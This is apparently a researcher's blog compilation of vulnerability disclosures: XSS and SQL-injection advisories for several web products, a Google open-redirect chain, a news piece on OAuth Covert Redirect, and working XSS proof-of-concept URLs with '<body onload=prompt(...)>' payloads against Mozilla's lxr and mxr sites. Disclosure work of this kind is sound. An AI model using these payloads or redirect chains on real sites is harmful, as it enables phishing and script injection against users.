CVE-2015-2349 – SuperWebMailer 5.50.0.01160 XSS (Cross-site Scripting) Web Security Vulnerabilities

CVE-2015-2349 – SuperWebMailer 5.50.0.01160 XSS (Cross-site Scripting) Web Security Vulnerabilities

Exploit Title: CVE-2015-2349 – SuperWebMailer /defaultnewsletter.php” HTMLForm Parameter XSS Web Security Vulnerabilities

Product: SuperWebMailer

Vendor: SuperWebMailer

Vulnerable Versions: 5.*.0.*   4.*.0.*

Tested Version: 5.*.0.*   4.*.0.*

Advisory Publication: March 11, 2015

Latest Update: May 03, 2015

Vulnerability Type: Cross-Site Scripting [CWE-79]

CVE Reference: CVE-2015-2349

Impact CVSS Severity (version 2.0):

CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)

Impact Subscore: 2.9

Exploitability Subscore: 8.6

CVSS Version 2 Metrics:

Access Vector: Network exploitable; Victim must voluntarily interact with attack mechanism

Access Complexity: Medium

Authentication: Not required to exploit

Impact Type: Allows unauthorized modification

Author and Creditor: Jing Wang [School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore] (@justqdjing)

Information Details:

(1) Vendor & Product Description:

Vendor:

SuperWebMailer

Product & Vulnerable Versions:

SuperWebMailer

5.60.0.01190

5.50.0.01160

5.40.0.01145

5.30.0.01123

5.20.0.01113

5.10.0.00982

5.05.0.00970

5.02.0.00965

5.00.0.00962

4.50.0.00930

4.40.0.00917

4.31.0.00914

4.30.0.00907

4.20.0.00892

4.10.0.00875

Vendor URL & Download:

SuperWebMailer can be gained from here,

http://www.superwebmailer.de/

Product Introduction Overview:

“Super webmail is a web-based PHP Newsletter Software. The web-based PHP Newsletter Software Super webmail is the optimal solution for the implementation of a successful e-mail marketing.”

“To use the online PHP Newsletter Script is your own website / server with PHP 4 or newer, MySQL 3.23 or later and the execution of CronJobs required. Once installed, the online newsletter software Super webmail can be served directly in the browser. The PHP Newsletter Tool Super webmail can therefore be used platform-independent all operating systems such as Windows, Linux, Apple Macintosh, with Internet access worldwide. The PHP Newsletter Script allows you to manage your newsletter recipients including registration and deregistration from the newsletter mailing list by double-opt In, Double Opt-Out and automatic bounce management. Send online your personalized newsletter / e-mails in HTML and Text format with embedded images and attachments immediately in the browser or by CronJob script in the background immediately or at a later. With the integrated tracking function to monitor the success of the newsletter mailing, if thereby the openings of the newsletter and clicks on links in the newsletter graphically evaluated and presented. Put the integrated autoresponder to autorun absence messages or the receipt of e-mails to confirm.”

“It is now included CKEditor 4.4.7. An upgrade to the latest version is recommended as an in CKEditor 4.4.5 Vulnerability found. Super webmail from immediately contains new chart component for the statistics that do not need a flash and are therefore also represented on Apple devices. For the Newsletter tracking statistics is now an easy print version of the charts available that can be printed or saved with PDF printer driver installed in a PDF file. When viewing the e-mails in the mailing lists of the sender of the email is displayed in a column that sent the e-mail to the mailing list. For form creation for the newsletter subscription / cancellation are now available variant”

(2) Vulnerability Details:

SuperWebMailer web application has a computer security bug problem. It can be exploited by XSS attacks. This may allow a remote attacker to create a specially crafted request that would execute arbitrary script code in a user’s browser session within the trust relationship between their browser and the server. 

Several other related products 0-day vulnerabilities have been found by some other bug hunter researchers before. SuperWebMailer has patched some of them. FusionVM Vulnerability Management and Compliance provides sources for the latest info-sec news, tools, and advisories. It has published suggestions, advisories, solutions details related to web application vulnerabilities.

(2.1) The programming code flaw occurs at “&HTMLForm” parameter in “defaultnewsletter.php?” page.

Related Results:

http://seclists.org/fulldisclosure/2015/Mar/55

http://www.securityfocus.com/bid/73063

http://lists.openwall.net/full-disclosure/2015/03/07/3

http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1819

http://packetstormsecurity.com/files/131288/ECE-Projects-Cross-Site-Scripting.html

http://static-173-79-223-25.washdc.fios.verizon.net/?l=full-disclosure&m=142551542201539&w=2

https://cxsecurity.com/issue/WLB-2015030043

http://aibiyi.lofter.com/post/1cc9f4e9_6edf9bf

http://tetraph.tumblr.com/post/118764414962/canghaixiao-cve-2015-2349-superwebmailer

http://canghaixiao.tumblr.com/post/118764381217/cve-2015-2349-superwebmailer-5-50-0-01160-xss

http://essaybeans.lofter.com/post/1cc77d20_6edf28c

https://www.facebook.com/essaybeans/posts/561250300683107

https://twitter.com/essayjeans/status/598021595974602752

https://www.facebook.com/pcwebsecurities/posts/687478118064775

http://tetraph.blog.163.com/blog/static/234603051201541231655569/

https://plus.google.com/112682696109623633489/posts/djqcrDw5dQp

http://essayjeans.blogspot.com/2015/05/cve-2015-2349-superwebmailer-550001160.html

https://mathfas.wordpress.com/2015/05/12/cve-2015-2349-superwebmailer-5-50-0-01160-xss/

http://www.tetraph.com/blog/xss-vulnerability/cve-2015-2349-superwebmailer-5-50-0-01160-xss/

https://vulnerabilitypost.wordpress.com/2015/05/12/cve-2015-2349-superwebmailer-5-50-0-01160-xss/

http://aibiyi.blogspot.com/2015/05/cve-2015-2349-superwebmailer-550001160.html

CVE-2014-8490 TennisConnect COMPONENTS System XSS (Cross-Site Scripting) Security Vulnerability

CVE-2014-8490 TennisConnect COMPONENTS System XSS (Cross-Site Scripting) Security Vulnerability

Exploit Title: TennisConnect “TennisConnect COMPONENTS System” /index.cfm pid Parameter XSS

Product: TennisConnect COMPONENTS System

Vendor: TennisConnect

Vulnerable Versions: 9.927

Tested Version: 9.927

Advisory Publication: Nov 18, 2014

Latest Update: Nov 18, 2014

Vulnerability Type: Cross-Site Scripting [CWE-79]

CVE Reference: CVE-2014-8490

CVSS Severity (version 2.0):

CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)

Impact Subscore: 2.9

Exploitability Subscore: 8.6

Credit: Wang Jing [CCRG, Nanyang Technological University, Singapore]

Advisory Details:

(1) Vendor URL:

http://www.tennisconnect.com/products.cfm#Components

Product Description:

TennisConnect COMPONENTS

* Contact Manager (online player database)

* Interactive Calendar including online enrollment

* League & Ladder Management through Tencap Tennis

* Group Email (including distribution lists, player reports, unlimited sending volume and frequency)

* Multi-Administrator / security system with Page Groups

* Member Administration

* MobileBuilder

* Online Tennis Court Scheduler

* Player Matching (Find-a-Game)

* Web Site Builder (hosted web site and editing tools at www. your domain name .com)

(2) Vulnerability Details.

TennisConnect COMPONENTS System has a security problem. It is vulnerable to XSS attacks.

(2.1) The vulnerability occurs at “/index.cfm?” page, with “&pid” parameter.

References:

http://packetstormsecurity.com/files/129662/TennisConnect-9.927-Cross-Site-Scripting.html

http://tetraph.com/security/cves/cve-2014-8490-tennisconnect-components-system-xss-cross-site-scripting-security-vulnerability/

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8490

https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8490

http://www.osvdb.org/show/osvdb/116149

http://cve.scap.org.cn/CVE-2014-8490.html

http://en.hackdig.com/?11701.htm

http://itsecurity.lofter.com/

http://seclists.org/fulldisclosure/2014/Dec/83

http://securitypost.tumblr.com/

http://computerobsess.blogspot.com/2015/02/cve-2014-8490-tennisconnect-components.html

http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/xss-vulnerability/cve-2014-8490-tennisconnect-components-system-xss-cross-site-scripting-security-vulnerability/

http://whitehatpost.blog.163.com/blog/static/2422320542015110102316210/#

http://tetraph.blogspot.com/2015/02/cve-2014-8490-tennisconnect-components.html

http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1352

CVE-2014-8752 JCE-Tech “Video Niche Script” XSS (Cross-Site Scripting) Security Vulnerability

CVE-2014-8752 JCE-Tech “Video Niche Script” XSS (Cross-Site Scripting) Security Vulnerability

Exploit Title: JCE-Tech “Video Niche Script” /view.php Multiple Parameters XSS

Product: “Video Niche Script”

Vendor: JCE-Tech

Vulnerable Versions: 4.0

Tested Version: 4.0

Advisory Publication: Nov 18, 2014

Latest Update: Nov 18, 2014

Vulnerability Type: Cross-Site Scripting [CWE-79]

CVE Reference: CVE-2014-8752

CVSS Severity (version 2.0):

CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)

Impact Subscore: 2.9

Exploitability Subscore: 8.6

Credit: Wang Jing [CCRG, Nanyang Technological University, Singapore]

Advisory Details:

(1) Vendor URL:
http://jce-tech.com/products/

Product Description:
“The PHP Video Script instantly creates a niche video site based on keywords users control via the admin console. The videos are displayed on users’ site, but streamed from the YouTube servers.”

(2) Vulnerability Details.

JCE-Tech “Video Niche Script” is vulnerable to XSS attacks.

(2.1) The vulnerability occurs at “view.php” page with “video”, “title” parameters.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8752

http://tetraph.com/security/cves/cve-2014-8752-jce-tech-video-niche-script-xss-cross-site-scripting-security-vulnerability/

https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8752

http://seclists.org/fulldisclosure/2014/Dec/84

http://www.securityfocus.com/bid/71738

http://www.intelligentexploit.com/view-details.html?id=20454

http://packetstormsecurity.com/files/129661/JCE-Tech-4.0-Cross-Site-Scripting.html

http://itinfotech.tumblr.com/

http://en.hackdig.com/?11701.htm

http://www.inzeed.com/kaleidoscope/xss-vulnerability/cve-2014-8752-jce-tech-video-niche-script-xss-cross-site-scripting-security-vulnerability/

http://ittechnology.lofter.com/

http://user.qzone.qq.com/2519094351/2

http://whitehatpost.blog.163.com/blog/static/242232054201511095133273/#

https://tetraph.wordpress.com/2015/02/10/cve-2014-8752-jce-tech-video-niche-script-xss-cross-site-scripting-security-vulnerability/

CVE-2014-9559 SnipSnap XSS (Cross-Site Scripting) Security Vulnerabilities

CVE-2014-9559 SnipSnap XSS (Cross-Site Scripting) Security Vulnerabilities

Exploit Title: SnipSnap /snipsnap-search? query Parameter XSS

Product: SnipSnap

Vulnerable Versions: 0.5.2a 1.0b1 1.0b2

Tested Version: 0.5.2a 1.0b1 1.0b2

Advisory Publication: Jan 30, 2015

Latest Update: Jan 30, 2015

Vulnerability Type: Cross-Site Scripting [CWE-79]

CVE Reference: CVE-2014-9559

CVSS Severity (version 2.0):

CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)

Impact Subscore: 2.9

Exploitability Subscore: 8.6

Credit: Wang Jing [MAS, Nanyang Technological University (NTU), Singapore]

Advisory Details:

(1) Vendor & Product Description

Vendor:

SnipSnap

Product & Version:

SnipSnap

0.5.2a

1.0b1

1.0b2

Vendor URL & Download:

http://snipsnap.org

Product Description:

“SnipSnap is a user friendly content management system with features such as wiki and weblog. “

(2) Vulnerability Details:

SnipSnap has a security problem. It can be exploited by XSS attacks.

(2.1) The vulnerability occurs at “snipsnap-search?” page with “query” parameter.

References:

http://www.securityfocus.com/bid/72397

http://www.cvedetails.com/cve/CVE-2014-9559/

http://seclists.org/fulldisclosure/2015/Feb/1

http://tetraph.com/security/cves/cve-2014-9559-snipsnap-xss-cross-site-scripting-security-vulnerabilities/

https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9559

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9559

http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1539

http://static-173-79-223-25.washdc.fios.verizon.net/?a=139222176300014&r=1&w=2

http://ittechnology.lofter.com/post/1cfbf60d_5c34005

http://lists.kde.org/?a=139222176300014&r=1&w=2

http://itinfotech.tumblr.com/post/110692217346/securitypost-cve-2014-9559-snipsnap-xss

http://marc.info/?a=139222176300014&r=1&w=4

https://webtechwire.wordpress.com/2015/02/11/cve-2014-9559-snipsnap-xss-cross-site-scripting-security-vulnerabilities/

http://itprompt.blogspot.com/2015/02/cve-2014-9559-snipsnap-xss-cross-site.html

CVE-2014-9558 SmartCMS Multiple SQL Injection Security Vulnerability

 
 

CVE-2014-9558 SmartCMS Multiple SQL Injection Security Vulnerability

 

Exploit Title: Smartwebsites SmartCMS v.2 Multiple SQL Injection Security Vulnerabilities
Product: SmartCMS v.2
Vendor: Smartwebsites
Vulnerable Versions: v.2
Tested Version: v.2
Advisory Publication: Jan 22, 2015
Latest Update: Jan 22, 2015
Vulnerability Type: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) (CWE-89)
CVE Reference: CVE-2014-9558
CVSS Severity (version 2.0):
CVSS v2 Base Score: 7.5 (HIGH) (AV:N/AC:L/Au:N/C:P/I:P/A:P) (legend)
Impact Subscore: 6.4
Exploitability Subscore: 10.0
Credit: Wang Jing [MAS, Nanyang Technological University (NTU), Singapore]

 

 

Advisory Details:

 

(1) Vendor & Product Description

 

Vendor: Smartwebsites

 

Product & Version: SmartCMS v.2

 

Vendor URL & Download:

http://www.smartwebsites.com.cy/index.php?pageid=13&lang=en

 

Product Description:

“SmartCMS is one of the most user friendly and smart content management systems there is in the Cyprus market. It makes the content management of a webpage very easy and simple, regardless of the user’s technical skills.”

 

(2) Vulnerability Details:

SmartCMS v.2 has a security vulnerability. It can be exploited by SQL Injection attacks.

 

(2.1) The first vulnerability occurs at “index.php?” page with “pageid” “lang” multiple parameters.

 

(2.2) The second vulnerability occurs at “sitemap.php?” page with “pageid” “lang” multiple parameters.

 

 

References:

http://www.tetraph.com/security/cves/cve-2014-9558-smartcms-sql-injection-security-vulnerability/

https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9558

http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1501

http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-201501-607

http://packetstormsecurity.com/files/130075/SmartCMS-2-SQL-Injection.html

http://webtechhut.blogspot.com/2015/02/cve-2014-9558-smartcms-multiple-sql.html

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9558

https://biyiniao.wordpress.com/2015/02/11/cve-2014-9558-smartcms-multiple-sql-injection-security-vulnerability/

http://xforce.iss.net/xforce/xfdb/100332

http://lifegrey.tumblr.com/post/110700573094/ithut-cve-2014-9558-smartcms-multiple-sql

http://milw00rm.com/exploits/6672

http://guyuzui.lofter.com/post/1ccdcda4_5c409ca

http://www.inzeed.com/kaleidoscope/cves/cve-2014-9558-smartcms-multiple-sql-injection-security-vulnerability/

http://whitehatpost.blog.163.com/blog/static/242232054201511112757529/

 

CVE-2014-9557 SmartCMS Multiple XSS (Cross-Site Scripting) Security Vulnerability

 
 

CVE-2014-9557 SmartCMS Multiple XSS (Cross-Site Scripting) Security Vulnerability

 

Exploit Title: Smartwebsites SmartCMS v.2 Multiple XSS Security Vulnerabilities
Product: SmartCMS v.2
Vendor: Smartwebsites
Vulnerable Versions: v.2
Tested Version: v.2
Advisory Publication: Jan 22, 2015
Latest Update: Jan 22, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-9557
CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Credit: Wang Jing [MAS, Nanyang Technological University (NTU), Singapore]

 

 

Advisory Details:

 

(1) Vendor & Product Description

Vendor: Smartwebsites

Product & Version: SmartCMS v.2

Vendor URL & Download:

http://www.smartwebsites.com.cy/index.php?pageid=13&lang=en

Product Description: “SmartCMS is one of the most user friendly and smart content management systems there is in the Cyprus market. It makes the content management of a webpage very easy and simple, regardless of the user’s technical skills.”

 

(2) Vulnerability Details:

SmartCMS v.2 has a security vulnerability. It can be exploited by XSS attacks.

(2.1) The first vulnerability occurs at “index.php?” page with “pageid” “lang” multiple parameters.

(2.2) The second vulnerability occurs at “sitemap.php?” page with “pageid” “lang” multiple parameters.

 

 

References:

http://www.tetraph.com/security/cves/cve-2014-9557-smartcms-multiple-xss-cross-site-scripting-security-vulnerability/

https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9557

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9557

http://packetstormsecurity.com/files/130076/SmartCMS-2-Cross-Site-Scripting.html

http://en.hackdig.com/?13971.htm

http://cxsecurity.com/issue/WLB-2015010130

https://hackertopic.wordpress.com/2015/02/11/cve-2014-9557-smartcms-multiple-xss-cross-site-scripting-security-vulnerability/

http://cve.scap.org.cn/CVE-2014-9557.html

http://securitypost.tumblr.com/post/110696783722/itinfotech-cve-2014-9557-smartcms-multiple-xss

http://exploitarchive.com/smartcms-2-cross-site-scripting/

http://webtechhut.blogspot.com/2015/02/cve-2014-9557-smartcms-multiple-xss.html

http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1502

http://blog.163.com/greensun_2006/blog/static/11122112201511105129826/

http://itsecurity.lofter.com/post/1cfbf9e7_5c3a4a8

 

 ty.lofter.com/post/1cfbf9e7_5c3a4a8″ target=”_blank”>http://itsecurity.lofter.com/post/1cfbf9e7_5c3a4a8

CVE-2014-7291 Springshare LibCal XSS (Cross-Site Scripting) Security Vulnerability

CVE-2014-7291  Springshare LibCal XSS (Cross-Site Scripting) Security Vulnerability Weakness

Exploit Title: Springshare LibCal Multiple XSS (Cross-Site Scripting) Security Weakness

Product: LibCal

Vendor: Springshare

Vulnerable Versions: 2.0

Tested Version: 2.0

Advisory Publication: Nov 25, 2014

Latest Update: Nov 25, 2014

Vulnerability Type: Cross-Site Scripting [CWE-79]

CVE Reference: CVE-2014-7291

CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)

Impact Subscore: 2.9

Exploitability Subscore: 8.6

Solution Status: Fixed by Vendor

Credit: Wang Jing [SPMS, Nanyang Technological University (NTU), Singapore]

Recommendation Details:


(1) Vendor & Product Description:


Vendor:
Springshare

Product & Vulnerable Versions:
LibCal
2.0

Vendor URL & download:

http://springshare.com/libcal/

Product Introduction Overview:

“LibCal is an easy to use calendaring and event management platform for libraries. Used by 1,600+ libraries worldwide, LibCal makes it a breeze to manage online calendar of events, offer room bookings online, manage the opening hours for various locations.”

    “Manage Calendar & Event Registrations
Create custom Registration Forms
Manage Consultation Appointments”

    Create an Online Room Booking System
Display Library & Departmental Hours
Share Calendar/Event Info via Widgets”

(2) Vulnerability Details:

Springshare LibCal web application has a security bug problem. It can be exploited by XSS attacks. This may allow a remote attacker to create a specially crafted request that would execute arbitrary script code in a user’s browser session within the trust relationship between their browser and the server.

Several Springshare LibCal products vulnerabilities have been found by some other bug hunter researchers before. Springshare LibCal has patched some of them. The MITRE Corporation is a not-for-profit company that operates multiple federally funded research and development centers (FFRDCs), which provide innovative, practical solutions for some of our nation’s most critical challenges in defense and intelligence, aviation, civil systems, homeland security, the judiciary, healthcare, and cybersecurity. It has published suggestions, advisories, solutions details related to Springshare LibCal vulnerabilities.

(2.1) The first code programming flaw  occur at “/api_events.php?” page, with “&m” and “&cid” parameters.

(3) Solutions:

2014-10-01: Report vulnerability to Vendor

2014-10-15: Vendor replied with thanks and vendor changed the source code

References:

https://cxsecurity.com/issue/WLB-2014120002

http://tetraph.com/security/cves/cve-2014-7291-springshare-libcal-xss-cross-site-scripting-vulnerability/

http://seclists.org/fulldisclosure/2014/Nov/90

http://packetstormsecurity.com/files/129289/Springshare-LibCal-2.0-Cross-Site-Scripting.html

http://www.securityfocus.com/bid/71319

http://www.scap.org.cn/CVE-2014-7291.html

http://whitehatpost.blog.163.com/blog/static/2422320542014112982712/#

http://www.cnnvd.org.cn/vulnerability/show/cv_id/2014110532

http://blog.livedoor.jp/dvw_j/archives/42129940.html

http://www.cnvd.org.cn/flaw/show/CNVD-2014-08568

http://marc.info/?l=full-disclosure&m=141705590727919&w=4

http://www.inzeed.com/kaleidoscope/cves/cve-2014-7291-springshare-libcal-xss-cross-site-scripting-security-vulnerability/

Bypass Google Open Redirect Filter Based on Googleads.g.doubleclick.net

Bypass Google Open Redirect Filter Based on Googleads.g.doubleclick.net

— Google Covert Redirect Vulnerability Based on Googleads.g.doubleclick.net

The vulnerability exists at “Logout?” page with “&continue” parameter, i.e.

https://www.google.com/accounts/Logout?service=writely&continue=https://googleads.g.doubleclick.net

The vulnerability can be attacked without user login. Tests were performed on Firefox (26.0) in Ubuntu (12.04) and IE (9.0.15) in Windows 7.

 

(1) When a user is redirected from Google to another site, Google will check whether the redirected URL belongs to domains in Google’s whitelist (The whitelist usually contains websites belong to Google), e.g.

docs.google.com

googleads.g.doubleclick.net

If this is true, the redirection will be allowed.

However, if the URLs in a redirected domain have open URL redirection  vulnerabilities themselves, a user could be redirected from Google to a vulnerable URL in that domain first and later be redirected from this vulnerable site to a malicious site. This is as if being redirected from Google directly.

One of the vulnerable domain is,

googleads.g.doubleclick.net (Google’s Ad System)

(2) Use one webpage for the following tests. The webpage address is “http://www.inzeed.com/kaleidoscope“. We can suppose that this webpage is malicious.

Vulnerable URL:

https://www.google.com/accounts/Logout?service=writely&continue=https://google.com/

POC:

https://www.google.com/accounts/Logout?service=wise&continue=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3DL%26ai%3DCtHoIVxn3UvjLOYGKiAeelIHIBfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoE5AFP0NHr5cHwFmWgKNs6HNTPVk7TWSV-CDHX83dKdGSWJ2ADoZNIxUHZwjAODRyDY_7nVtpuqSLOTef4xzVxDQ2U22MNbGak33Ur7i2jDB8LdYt9TbC3ifsXmklY5jl3Zpq4_lP7wagVfjt0–tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_lPlnyGjlWzF8yn437iaxhGRwYLt_CymifLO2YaJPkCm9nLpONtUM-mstUSpKQrP2VjjaZkbDtuK0naLLBV37aYEY4TzWQi8fQGN47z4XgpinBCna91zQayZjn2wxccDCl0zgBAGgBhU%26num%3D0%26sig%3DAOD64_3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%26client%3Dca-pub-0466582109566532%26adurl%3Dhttp%3A%2F%2Fwww.inzeed.com%2Fkaleidoscope

 

POC Video:

https://www.youtube.com/watch?v=btuSq89khcQ&feature=youtu.be

 

Reporter:

Wang Jing, School of Physical and Mathematical Sciences, Nanyang Technological University, Singapore.

http://www.tetraph.com/wangjing

 

Related Articles:

http://computerobsess.blogspot.com/2014/11/google-covert-redirect-vulnerability.html

http://www.hotforsecurity.com/blog/googles-doubleclick-advertising-platform-vulnerable-to-open-redirect-attacks-10822.html
http://seclists.org/fulldisclosure/2014/Nov/29
http://cxsecurity.com/issue/WLB-2014110106
http://securityrelated.blogspot.sg/2014/11/covert-redirect-vulnerability-based-on.html
http://tetraph.com/security/covert-redirect/google-covert-redirect-vulnerability-based-on-googleads-g-doubleclick-net/ 

http://lifegrey.tumblr.com/post/103787782054/whitehatview-googles-doubleclick-advertising

Mozilla mozilla.org Two Sub-Domains ( Cross Reference) XSS Vulnerability ( All URLs Under the Two Domains)

Mozilla mozilla.org Two Sub-Domains ( Cross Reference) XSS Vulnerability ( All URLs Under the Two Domains)

Domains:

http://lxr.mozilla.org/

http://mxr.mozilla.org/

(The two domains above are almost the same)

 

 

Websites information:

lxr.mozilla.org, mxr.mozilla.org are cross references designed to display the Mozilla source code. The sources displayed are those that are currently checked in to the mainline of the mozilla.org CVS server, Mercurial Server, and Subversion Server; these pages are updated many times a day, so they should be pretty close to the latest‑and‑greatest. (from Mozilla)

 

 

 

Vulnerability description:

All pages under the following two URLs are vulnerable.

http://lxr.mozilla.org/mozilla-central/source

http://mxr.mozilla.org/mozilla-central/source

 

 

This means all URLs under the above two domains can be used for XSS attacks targeting Mozilla’s users.

 

Since there are large number of pages under them. Meanwhile, the contents of the two domains vary. This makes the vulnerability very dangerous. Attackers can use different URLs to design XSS attacks to Mozilla’s variety class of users.

 

The vulnerability have been reported to bugzilla.mozilla.org. Mozilla are dealing with this issue.

 

 

 

 

POCs:

http://lxr.mozilla.org/mozilla-central/source/<body onload=prompt(“justqdjing”)>

http://lxr.mozilla.org/mozilla-central/source/mobile/android/<body onload=prompt(“justqdjing”)>

http://lxr.mozilla.org/mozilla-central/source/Android.mk/<body onload=prompt(“tetraph”)>

http://lxr.mozilla.org/mozilla-central/source/storage/public/mozIStorageBindingParamsArray.idl/<body onload=prompt(“tetraph”)>

http://lxr.mozilla.org/mozilla-central/source/netwerk/protocol/device/AndroidCaptureProvider.cpp<body onload=prompt(“tetraph”)>

 

http://mxr.mozilla.org/mozilla-central/source/<body onload=prompt(“justqdjing”)>

http://mxr.mozilla.org/mozilla-central/source/webapprt/<body onload=prompt(“justqdjing”)>

http://mxr.mozilla.org/mozilla-central/source/mozilla-config.h.in/<body onload=prompt(“justqdjing”)>

http://mxr.mozilla.org/mozilla-central/source/chrome/nsChromeProtocolHandler.h/<body onload=prompt(“tetraph”)>

http://mxr.mozilla.org/mozilla-central/source/security/sandbox/linux/x86_32_linux_syscalls.h/<body onload=prompt(“tetraph”)>

 

 

 

POC Video:

https://www.youtube.com/user/tetraph

 

 

 

 

Vulnerability Analysis:

Take the following link as an example,

http://lxr.mozilla.org/mozilla-central/source/chrome/<attacktest>

 

We can see that for the page reflected, it contains the following codes.

<a href=”/mozilla-central/source/chrome/%253Cattacktest%253E”>

<attacktest></attacktest>

</a>

 

If we insert “<body onload=prompt(“justqdjing”)>” into the URL, the code can be executed.

 

 

 

The vulnerability can be attacked without user login. Tests were performed on Firefox (26.0) in Ubuntu (12.04) and IE (9.0.15) in Windows 7.

 

 

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy. (From Wikepedia)

 

 

 

Posted By:

Wang Jing, School of Physical and Mathematical Sciences, Nanyang Technological University, Singapore.http://tetraph.com/wangjing/

 

 

 

 

 

More Details:

http://www.hotforsecurity.com/blog/cross-site-scripting-vulnerability-in-mozillas-cross-reference-sub-domains-10607.html

http://www.tetraph.com/blog/xss-vulnerability/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains/

https://www.xssposed.org/incidents/domain/lxr.mozilla.org/

https://www.youtube.com/watch?v=onA5BgC3zIY

http://itsecuritynews.info/2014/10/20/cross-site-scripting-vulnerability-in-mozillas-cross-reference-sub-domains/

http://news.softpedia.com/news/XSS-Risk-Found-In-Links-to-New-York-Times-Articles-Prior-to-2013-462334.shtml

https://brica.de/alerts/alert/public/791810/cross-site-scripting-xss-vulnerability-in-new-york-times-articles-before-2013/

https://twitter.com/essayjeans

http://infopunk.org/main/blog/2014/10/20/cross-site-scripting-vulnerability-in-mozillas-cross-reference-sub-domains/

Serious Covert Redirect Vulnerability Found in OAuth 2.0 and OpenID

Following in the steps of the OpenSSL vulnerability Heartbleed, A serious Covert Redirect vulnerability related to OAuth 2.0 and OpenID has been found. Almost all major providers of OAuth 2.0 and OpenID are affected, such as Facebook, Google, Yahoo, LinkedIn, Microsoft, Paypal, GitHub, QQ, Taobao, Weibo, VK, Mail.Ru, Sohu, etc.

 

 

 

Wang Jing, a Ph.D. student at the Nanyang Technological University in Singapore, discovered that the serious vulnerability “Covert Redirect” flaw can masquerade as a log-in popup based on an affected site’s domain. Covert Redirect is based on a well-known exploit parameter.

For example, someone clicking on a malicious phishing link will get a popup window in Facebook, asking them to authorize the app. Instead of using a fake domain name that’s similar to trick users, the Covert Redirect flaw uses the real site address for authentication.

If a user chooses to authorize the log in, personal data (depending on what is being asked for) will be released to the attacker instead of to the legitimate website. This can range from email addresses, birth dates, contact lists, and possibly even control of the account.

Regardless of whether the victim chooses to authorize the app, he or she will then get redirected to a website of the attacker’s choice, which could potentially further compromise the victim.

Wang says he has already contacted Facebook and has reported the flaw, but was told that the company “understood the risks associated with OAuth 2.0,” and that “short of forcing every single application on the platform to use a whitelist,” fixing this bug was “something that can’t be accomplished in the short term.”

Facebook isn’t the only site affected. Wang says he has reported this to Google, LinkedIn, and Microsoft, which gave him various responses on how they would handle the matter.

A sample list of websites that are affected by the Covert Redirect vulnerability. Wang Jing                                         

Google (which uses OpenID) told him that the problem was being tracked, while LinkedIn said that the company has published a blog on the matter. Microsoft, on the other hand, said an investigation had been done and that the vulnerability existed on the domain of a third party and not on its own sites.

“Patching this vulnerability is easier said than done. If all the third-party applications strictly adhere to using a whitelist, then there would be no room for attacks,” said Wang.

“However, in the real world, a large number of third-party applications do not do this due to various reasons. This makes the systems based on OAuth 2.0 or OpenID highly vulnerable,” he added.

LinkedIn engineer Shikha Sehgal wrote a blog post about the creation of a whitelist for the site more than a month before Wang published his findings.

“In order to make the LinkedIn platform even more secure, and so we can comply with the security specifications of OAuth 2, we are asking those of you who use OAuth 2 to register your application’s redirect URLs with us by April 11, 2014,” she said.

Sehgal did not explicitly say that the measure was in response to a flaw in OAuth 2, but the social network did confirm to CNET that the vulnerability that Wang detailed is the same one that inspired the blog post.

PayPal also has addressed the flaw.

“When PayPal implemented OAuth2.0/OpenID, we engineered additional security measures to protect our merchants and customers. These measures protect PayPal customers from this specific OAuth2.0/OpenID vulnerability,” James Barrese, PayPal’s CTO, said in a blog post on Friday. PayPal declined to add details about those measures.

Jeremiah Grossman, founder and interim CEO at WhiteHat Security, a website security firm, agreed with Wang’s findings after looking at the data.

“While I can’t be 100 percent certain, I could have sworn I’ve seen a report of a very similar if not identical vulnerability in OAuth. It would appear this issue is essentially a known WONTFIX,” Grossman said.

“This is to say, it’s not easy to fix, and any effective remedies would negatively impact the user experience. Just another example that Web security is fundamentally broken and the powers that be have little incentive to address the inherent flaws.”

Further corroborating Wang’s findings is Chris Wysopal, CTO at programming code verification firm Veracode.

Wsyopal told CNET that it looks to be a “very real issue” and that OAuth 2.0 looks vulnerable to phishing and redirect attacks.

